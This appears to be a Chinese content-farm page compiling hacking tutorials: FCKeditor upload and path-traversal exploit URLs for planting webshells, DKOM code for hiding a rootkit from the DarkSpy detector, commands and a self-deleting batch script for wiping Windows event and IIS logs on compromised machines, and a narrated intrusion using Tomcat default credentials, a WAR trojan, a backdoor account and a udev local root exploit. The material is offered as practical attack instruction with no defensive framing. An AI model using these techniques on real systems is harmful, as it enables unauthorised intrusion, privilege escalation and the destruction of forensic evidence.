实例讲解如何利用网页编辑器入侵武林安全网

时间：2022-12-05 05:56:11 作者：枝月综合材料收藏本文下载本文

“枝月”通过精心收集，向本站投稿了5篇实例讲解如何利用网页编辑器入侵武林安全网，下面是小编为大家整理后的实例讲解如何利用网页编辑器入侵武林安全网，仅供参考，大家一起来看看吧。

目录
第1篇：实例讲解如何利用网页编辑器入侵武林安全网第2篇：教你如何对抗反入侵工具武林安全网第3篇：的入侵痕迹清理技巧武林安全网第4篇：实例讲解利用迂回战术拿下某网站第5篇：实例讲解如何在Linux下修改Apache服务器网页密码

篇1：实例讲解如何利用网页编辑器入侵武林安全网

FCKeditor

FCKeditor编辑器页/查看编辑器版本/查看文件上传路径

FCKeditor编辑器页

FCKeditor/_samples/default.html

查看编辑器版本

FCKeditor/_whatsnew.html

查看文件上传路径

fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径

Note:[Hell1]截至02月15日最新版本为FCKeditor v2.6.6

[Hell2]记得修改其中两处asp为FCKeditor实际使用的脚本语言

FCKeditor被动限制策略所导致的过滤不严问题

影响版本: FCKeditor x.x <= FCKeditor v2.4.3

脆弱描述：

FCKeditor v2.4.3中File类别默认拒绝上传类型：html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|

pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

Fckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件

上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName，而没有使用$sExtension为后缀

直接导致在win下在上传文件后面加个.来突破[未测试]

而在apache下，因为“Apache文件名解析缺陷漏洞”也可以利用之，详见“附录A”

另建议其他上传漏洞中定义TYPE变量时使用File类别来上传文件,根据FCKeditor的代码，其限制最为狭隘，

攻击利用:

允许其他任何后缀上传

Note:[Hell1]原作：superhei.blogbus.com/logs/2006/02/1916091.html

利用2003路径解析漏洞上传网马

影响版本: 附录B

脆弱描述：

利用2003系统路径解析漏洞的原理，创建类似“bin.asp”如此一般的目录，再在此目录中上传文件即可被脚本解释器以相应脚本权限执行。

攻击利用:

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

FCKeditor PHP上传任意文件漏洞

影响版本: FCKeditor 2.2 <= FCKeditor 2.4.2

脆弱描述：

FCKeditor在处理文件上传时存在输入验证错误，远程攻击可以利用此漏洞上传任意文件，

在通过editor/filemanager/upload/php/upload.php上传文件时攻击者可以通过为Type参数定义无效的值导致上传任意脚本。

成功攻击要求config.php配置文件中启用文件上传，而默认是禁用的。攻击利用: (请修改action字段为指定网址)：

FCKeditor 《=2.4.2 for php.html

Note:如想尝试v2.2版漏洞，则修改Type=任意值即可，但注意，如果换回使用Media则必须大写首字母M,否则LINUX下，FCKeditor会对文件目录进行文件名校验，不会上传成功的。

TYPE自定义变量任意上传文件漏洞

影响版本: 较早版本

脆弱描述：

通过自定义Type变量的参数，可以创建或上传文件到指定的目录中去，且没有上传文件格式的限制。

攻击利用: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

打开这个地址就可以上传任何类型的文件了，Shell上传到的默认位置是:

www.heimian.com/UserFiles/all/1.asp

“Type=all” 这个变量是自定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:

/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp

网马就可以传到网站的根目录下.

Note:如找不到默认上传文件夹可检查此文件: fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor 新闻组件遍历目录漏洞

影响版本:aspx版FCKeditor，其余版本未测试

脆弱描述：如何获得webshell请参考上文“TYPE自定义变量任意上传文件漏洞”

攻击利用:

修改CurrentFolder参数使用 ../../来进入不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp

根据返回的XML信息可以查看网站所有的目录。

/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

FCKeditor中webshell的其他上传方式

影响版本:非优化/精简版本的FCKeditor

篇2：教你如何对抗反入侵工具武林安全网

DarkSpy是由CardMagic和wowocock编写的anti-rootkit反入侵不错的工具，

教你如何对抗反入侵工具武林安全网

。因为正在写的本科毕设与检测rootkit有关，所以这几天分析一下，看有什么可利用的。分析进行得比较顺利，因为DarkSpy里面所采用的技术多数Internet上已经见过，不过肯定有一些创意的哦。

先说说里面的新东西：驱动开发网站的一位会员启发我们DarkSpy修改了

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession Manager中的

GlobalFlag为0x4000，这是做什么呢？原来这会使得NtGlobalFlag加入Maintain

Object Typelist标志，于是系统创建对象时会把它加入Type链表中，这样可以遍历链表来查找对象。修改标志需要重启机器，这应该就是“强模式”要重启的理由。正如那位会员所说，作者故意隐瞒了这点，我也觉得不妥：如果是为了防止别人crack，也应该提供卸载程序的，因为这个标志一直不被清除，不再使用DarkSpy的用户依然会为此付出代价：每个内核对象都要额外分配16字节的核心空间，那成千上万的对象呢?

这个技巧对DKOM来说比较weak了，用下面的代码清除：

VOID

ClearObjectCreatorInfo(

PVOID Object

)

{

POBJECT_HEADER bjectHeader = OBJECT_TO_OBJECT_HEADER(Object);

POBJECT_HEADER_CREATOR_INFO CreatorInfo =

OBJECT_HEADER_TO_CREATOR_INFO(ObjectHeader);

if (CreatorInfo != NULL)

{

RemoveEntryList(&CreatorInfo->TypeList);

InitializeListHead(&CreatorInfo->TypeList);

}

传入处理的对象就脱链了，

这几行代码可让“强模式”失效。

下面简单说说击破的法门：

一、驱动：

DarkSpy1.0.3版及以前很简单，学习Futo rootkit断开PsLoadedModuleList，再将驱动对象传入上面的ClearObjectCreatorInfo，不论“强模式”还是“弱模式”均搞定。DarkSpy1.0.4版有了修改，不过依旧是查找DriverObject，在适当的时候清理掉就可以了，比如可以walkkernel object tree，还有更简单的办法:)

二、进程：

DarkSpy的进程功能把好多东西堆到一起来恶心rootkit的作者们，怎么样，被恶心到了吧？虽

然里面的技术可能不新鲜，但是这么一组合，难以全部清除的。下面把隐藏需要做的事列举列举：

1、PspCidTable就学futo抹掉；

2、进程、线程对象传入ClearObjectCreatorInfo；

3、它还使用csrss里的进程句柄，直接到csrss进程里ZwClose掉最简单；

4、DarkSpy在我的机器崩溃过，分析dump，原来与杀软冲突：它也hook了SwapContext，不好办？

恢复不就行了。恢复时机很重要，相信你也能想到不错的。说说我的思路：在任一条call SwapContext之前的路径上下hook，hook的程序什么也不做，专门检查SwapContext，被改则改回去，这是很通用的做法，它要是hook别的地方也一样搞定。

5、还有一个由线程到进程的，自己去发掘吧，也该动动手么...嘿嘿。

最后可以完全隐藏自己的进程，不过你累不累，什么东西非有进程才能做，没进程就不能做？都核心驱动了...感觉真没必要。

三、文件：

据说是Create IRP，嘿嘿，不过我还没学文件系统驱动，那位大虾补充吧。

四、注册表：

虽测试版没有功能，但看看界面可以猜测猜测内部版：应该是复制或是仿制开源工具RegHives来做的，击破的原理网上有不少。只是dump的方法可能不同。

篇3：的入侵痕迹清理技巧武林安全网

清理你入侵后的三个重要痕迹

应用程序日志

安全日志

系统日志

DNS日志默认位置：%systemroot%system32config，默认文件大小512KB，管理员都会改变这个默认大小，

必备的入侵痕迹清理技巧武林安全网

。安全日志文件：%systemroot%system32configSecEvent.EVT

系统日志文件：%systemroot%system32configSysEvent.EVT

应用程序日志文件：%systemroot%system32configAppEvent.EVT

FTP日志默认位置：%systemroot%system32logfilesmsftpsvc1，默认每天一个

WWW日志默认位置：%systemroot%system32logfilesw3svc1，默认每天一个日志

以上日志在注册表里的键：应用程序日志，安全日志，系统日志，DNS服务器日志，

它们这些LOG文件在注册表中的：

HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog

钥匙（表示成功）和锁（表示当用户在做什么时被系统停止）。接连四个锁图标，表示四次失败审核，事件类型是帐户登录和登录注销失败

怎样删除这些日志：通过上面，得知日志文件通常有某项服务在后台保护，除了系统日志安全日志应用程序日志等等，它们的服务是Windos2000的关键进程，而且与注册表文件在一块，当Windows2000启动后，启动服务来保护这些文件，所以很难删除.

下面就是很难的安全日志和系统日志了，守护这些日志的服务是Event Log，试着停掉它！ D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 这项服务无法接受请求的“暂停” 或“停止” 操作。

怎么清除系统日志.

怎么利用工具清除IIS日志

怎么清除历史和cookie

怎么察看防火墙 Blackice的日志

netstat -an 表示的什么意思

--------------------------------------------------------------------------------------------------------------

1. 系统日志通过手工很难清除. 这里我们介绍一个工具 clearlog.exe

使用方法:

Usage: clearlogs [computername] <-app / -sec / -sys>

-app = 应用程序日志

-sec = 安全日志

-sys = 系统日志

a. 可以清除远程计算机的日志

** 先用ipc连接上去: net use ipipc$ 密码/user:用户名

** 然后开始清除: 方法

clearlogs ip -app 这个是清除远程计算机的应用程序日志

clearlogs ip -sec 这个是清除远程计算机的安全日志

clearlogs ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面

然后清除. 方法:

clearlogs -app 这个是清除远程计算机的应用程序日志

clearlogs -sec 这个是清除远程计算机的安全日志

clearlogs -sys 这个是清除远程计算机的系统日志

安全日志已经被清除.Success: The log has been cleared 成功.

为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.

例如建立一个 c.bat

rem ============================== 开始

@echo off

clearlogs -app

clearlogs -sec

clearlogs -sys

del clearlogs.exe

del c.bat

exit

rem ============================== 结束

在你的计算机上面测试的时候可以不要 @echo off 可以显示出来. 你可以看到结果

第一行表示: 运行时不显示窗口

第二行表示: 清除应用程序日志

第三行表示: 清除安全日志

第四行表示: 清除系统日志

第五行表示: 删除 clearlogs.exe 这个工具

第六行表示: 删除 c.bat 这个批处理文件

第七行表示: 退出

用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方法

AT 时间 c:c.bat

之后你就可以安全离开了. 这样才更安全一点.

--------------------------------------------------------------------------------------------------------------

2. 清除iis日志:

工具:cleaniis.exe

使用方法:

iisantidote

iisantidote stop

stop opiton will stop iis before clearing the files and restart it after

篇4：实例讲解利用迂回战术拿下某网站

什么是迂回攻击？我就来小介绍一下：通常我们攻击一个网站的时候，由于不了解网站源码结构，也没有常见的漏洞，我们就可以先找出这个网站源码的一些特征字符，然后利用google搜索和这个网站一样源码的站，要攻击的站可能没有漏洞，但是我们搜索到的站不一定没有漏洞，可能是配置上面的问题等，然后加以利用，成功得到shell以后我们就可以利用shell来查看网站的源码，然后再返回去攻击目标站点，这样就是我所谓的迂回了，当然也可以是社工网站管理员在其它网站或者是论坛上面的注册用户名和密码然后再回来测试目标站点，最终拿下目标站点就OK了，费话不多说了，下面就开始我今天的入侵渗透之旅了……

由于目标站点没有漏洞，配置上面的漏洞也没有，通过google搜索我找到一个和他一样源码的网站www.xxx.com:9999/wcm/loginpage.htm 然后进行了常用密码的猜解，但是也没有发现弱密码等漏洞，于是去掉wcm以及后面的，直接www.xxx.com:9999/ 结果发现是tomcat ，经测试用户名和密码为：admin/null 成功进入以后上传war木马，最后得到迂回攻击的网站的webshell 运行命令uname -a 得到服务器的内核版本Linux www.xxx.com 2.6.18-128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux 由于linux的2.6内核出了一个udev本地溢出漏洞，首先看一下webshell的运行权限，命令id，结果人品爆发了uid=0（root） gid=0（root） groups=0（root），1（bin），2(daemon），3（sys），4（adm），6（disk），10（wheel） context=user_u:system_r:unconfined_t，是root权限，既然是root权限，那么我们可以通过webshell来建立一个用户，然后利用putty来连接，进行本地溢出提权……但是通过常用的useradd username添加的用户密码为空，如果想利用passwd username来设置密码的话，我们的webshell是无法输入密码的，我们就郁闷使用他的参数，-p来操作了，结果搜索运行如下命令：useradd -p $1$Bj.BPMBM$pr3Vte2A9DW6jCzljcZNT1 liang //-p 后面的一串字符串是我在虚拟机中添加用户，然后复制他的密码来做为这里的密码，这样我就成功添加一个用户liang 打开putty 然后输入用户名和密码，连接，一切ok，权限为$ 为普通用户，下面就利用udev的溢出来进行提权了，

我本来按照此文所写来进行溢出 www.waitalone.cn/post/466.html 结果不成功，经查实，可能是溢出代码有问题，于是我就直接打开www.milw0rm.com/exploits/8478 在putty中运行如下命令：

[liang@www ~]$ vi test 粘贴上面的代码

[liang@www ~]$ wq 保存并退出

[liang@www ~]$chmod 777 test 添加任意用户可执行权限

[liang@www ~]$ps ax|grep udev|grep -v grep|awk {'print $1'} 获得udev进程号，结果为479，然后减1作为test参数

[liang@www ~]$sh test 478 结果返回

sh-3.2$ 返回这个说明不成功，我们多试几次

sh-3.2$ sh test 478 这样我试了三次，还是不行

sh-3.2$ sh test 476 这次成功了，我看到了可爱的#，哈哈人品爆炸了

然后vi /etc/passwd 把用户名liang的 uid和gid改为0，这样liang 就为root 权限了，哈哈。搞定收工！